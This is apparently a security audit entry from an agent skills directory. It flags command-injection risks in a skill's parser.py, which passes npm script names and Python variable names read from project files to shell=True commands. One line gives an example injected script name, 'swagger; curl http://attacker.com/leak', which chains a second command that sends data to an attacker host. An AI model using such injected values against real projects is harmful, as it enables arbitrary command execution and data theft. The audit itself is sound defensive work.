The Agent Skills Directory

[COMMAND_EXECUTION]: The parser.py and scripts/parser.py files use subprocess.run with shell=True to execute commands dynamically constructed from project file contents. Specifically, the try_express_spec function iterates through keys in the scripts object of a project's package.json and executes npm run {script_name} if the name contains "swagger" or "openapi". Because JSON keys are not sanitized, a malicious project could trigger arbitrary command execution by using a crafted script name (e.g., "swagger; curl http://attacker.com/leak").
[COMMAND_EXECUTION]: The try_fastapi_spec and try_flask_spec functions in the parser modules extract variable names from Python source files and interpolate them into a python -c shell command. While the regex used (\w+) restricts the characters in the variable name, the architectural pattern of executing shell commands based on content parsed from untrusted local files without strict validation is a security risk.
[COMMAND_EXECUTION]: The try_django_spec function executes a shell command string that combines multiple management commands using the || operator. While the command itself is static, it runs in a shell environment with shell=True, which is a practice generally discouraged due to potential security implications in broader contexts.

api-contract-validation